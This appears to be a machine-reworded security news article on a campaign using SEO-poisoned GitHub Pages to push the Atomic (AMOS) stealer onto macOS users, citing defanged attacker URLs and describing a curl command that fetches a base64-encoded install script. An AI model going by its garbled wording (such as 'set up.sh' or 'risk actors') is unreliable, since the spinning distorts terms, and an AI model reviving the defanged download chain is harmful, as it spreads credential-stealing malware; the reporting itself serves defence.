A complicated cyber-attack marketing campaign exploiting GitHub Pages to distribute the infamous Atomic stealer malware to macOS customers.
The risk actors behind this operation are leveraging Search Engine Optimization (Search engine optimisation) strategies to place malicious repositories on the high of search outcomes throughout main platforms, together with Google and Bing, concentrating on customers looking for reputable software program from know-how firms, monetary establishments, and password administration providers.
The marketing campaign demonstrates a multi-layered method the place cybercriminals create fraudulent GitHub repositories that masquerade as official software program distributors.
When victims seek for particular purposes, the poisoned search outcomes redirect them to malicious GitHub Pages internet hosting what seems to be reputable software program installers.
The LastPass Risk Intelligence, Mitigation, and Escalation (TIME) workforce recognized this risk after discovering two fraudulent repositories particularly concentrating on their clients, each created by the person “modhopmduck476” on September 16, 2025.
Atomic Stealer Marketing campaign Targets macOS Customers
The assault chain begins with victims encountering malicious GitHub Pages by means of Search engine optimisation-poisoned search outcomes.
Search engine optimisation-driven Referral to Malicious Software program
These repositories include misleading “Set up [Company] on MacBook” hyperlinks that redirect customers to secondary staging websites.
LastPass Impersonation Web page
Within the LastPass case, victims had been redirected to hxxps://ahoastock825[.]github[.]io/.github/lastpass, which subsequently forwarded them to macprograms-pro[.]com/mac-git-2-download.html.
The secondary website instructs customers to execute a terminal command that performs a CURL request to a base64-encoded URL.
Secondary website
This encoded URL resolves to bonoud[.]com/get3/set up.sh, which downloads the malicious payload disguised as a system “Replace” to the non permanent listing.
The downloaded file is definitely the Atomic stealer malware, often known as AMOS malware, which has been lively in cybercriminal circles since April 2023.
Atomic Stealer represents a complicated information-stealing risk particularly designed for macOS environments.
The malware is able to harvesting delicate information, together with passwords, browser cookies, cryptocurrency pockets info, and system credentials.
As soon as put in, it establishes persistence on the contaminated system and communicates with command-and-control (C2) servers to exfiltrate stolen information.
The risk actors have demonstrated operational resilience by creating a number of GitHub usernames to bypass takedown efforts.
This distributed method permits them to take care of their malicious infrastructure even when particular person repositories are reported and eliminated.
The marketing campaign’s scope extends past LastPass, with safety researchers figuring out comparable assaults concentrating on numerous know-how firms and monetary establishments by means of an identical techniques and strategies (TTPs).
LastPass has efficiently coordinated the takedown of the recognized malicious repositories and continues monitoring for added threats.
The corporate advises macOS customers to train warning when downloading software program by means of search outcomes and to at all times confirm the authenticity of repositories earlier than executing terminal instructions or putting in purposes from unofficial sources.
Comply with us on Google Information, LinkedIn, and X for each day cybersecurity updates. Contact us to characteristic your tales.
